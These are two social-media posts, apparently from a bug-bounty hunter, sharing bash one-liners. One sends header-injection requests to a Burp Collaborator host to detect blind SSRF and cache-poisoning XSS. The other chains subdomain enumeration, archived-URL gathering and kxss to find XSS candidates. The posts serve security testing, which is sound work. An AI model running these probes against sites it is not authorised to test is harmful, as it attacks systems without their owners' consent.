magikh0e :unverified: · @magikh0e
130 followers · 132 posts · Server infosec.exchange
Checking for blind #SSRF in Headers & #XSS via cache poisoning
cat urls.txt | assetfinder --subs-only| httprobe | while read url; do xss1=$(curl -s -L $url -H 'X-Forwarded-For: xss.burpcollaboratorhost'|grep xss) xss2=$(curl -s -L $url -H 'X-Forwarded-Host: xss.burpcollaboratorhost'|grep xss) xss3=$(curl -s -L $url -H 'Host: xss.burpcollaboratorhost'|grep xss) xss4=$(curl -s -L $url --request-target http://burpcollaboratorhost/ --max-time 2); echo -e "$url""\n""Method[1] X-Forwarded-For: xss+ssrf => $xss1""\n""Method[2] X-Forwarded-Host: xss+ssrf ==> $xss2""\n""Method[3] Host: xss+ssrf ==> $xss3""\n""Method[4] GET http://xss.burpcollaboratorhostHTTP/1.1 ""\n";done\
https://github.com/tomnomnom/assetfinder
https://github.com/tomnomnom/httprobe
#bugbounty #bugbountytips #burpsuite #assetfinder #httprobe #blindinjection #owasp
#ssrf #xss #bugbounty #bugbountytips #burpsuite #assetfinder #httprobe #blindinjection #owasp
magikh0e :unverified: · @magikh0e
130 followers · 132 posts · Server infosec.exchange
Simple Script for Finding Cross
Site Scripting (XSS) vulns
#!/bin/bash
subfinder -d $1 -o domains_subfinder_$1
amass enum --passive -d $1 -o domains_$1
cat domains_subfinder_$1 | tee -a domain_$1
cat domains_$1 | filter-resolved | tee -a domains_$1.txt
cat domains_$1.txt | httprobe -p http:81 -p http:8080 -p https:8443 | waybackurls | kxss | tee xss.txt
https://github.com/projectdiscovery/subfinder
https://github.com/OWASP/Amass
https://github.com/tomnomnom/hacks/tree/master/filter-resolved
https://github.com/tomnomnom/httprobe
https://github.com/tomnomnom/waybackurls
https://github.com/tomnomnom/hacks/tree/master/kxss
#bugbounty #bugbountytips #xss #subfinder #httprobe #waybackurls #kxss #amass
#bugbounty #bugbountytips #xss #subfinder #httprobe #waybackurls #kxss #AMASS